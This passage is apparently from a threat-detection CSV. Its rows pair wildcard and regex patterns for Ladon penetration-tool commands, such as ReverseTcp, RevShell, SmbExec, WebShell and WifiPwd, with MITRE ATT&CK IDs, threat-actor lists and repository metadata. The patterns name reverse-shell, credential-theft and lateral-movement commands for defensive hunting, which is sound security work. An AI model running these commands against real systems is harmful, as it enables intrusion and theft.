TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50749"
"*Ladon ReverseTcp *",".{0,1000}Ladon\sReverseTcp\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50750"
"*Ladon RevShell-*",".{0,1000}Ladon\sRevShell\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50751"
"*Ladon Runas*",".{0,1000}Ladon\sRunas.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50752"
"*Ladon RunPS *",".{0,1000}Ladon\sRunPS\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50753"
"*Ladon sc *",".{0,1000}Ladon\ssc\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50754"
"*Ladon SetSignAuth*",".{0,1000}Ladon\sSetSignAuth.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50755"
"*Ladon SmbExec *",".{0,1000}Ladon\sSmbExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50756"
"*Ladon Sniffer*",".{0,1000}Ladon\sSniffer.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50757"
"*Ladon SshExec *",".{0,1000}Ladon\sSshExec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50758"
"*Ladon SweetPotato*",".{0,1000}Ladon\sSweetPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50759"
"*Ladon TcpServer *",".{0,1000}Ladon\sTcpServer\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50760"
"*Ladon UdpServer*",".{0,1000}Ladon\sUdpServer.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50761"
"*Ladon WebShell*",".{0,1000}Ladon\sWebShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50762"
"*Ladon whoami*",".{0,1000}Ladon\swhoami.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50763"
"*Ladon WifiPwd*",".{0,1000}Ladon\sWifiPwd.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 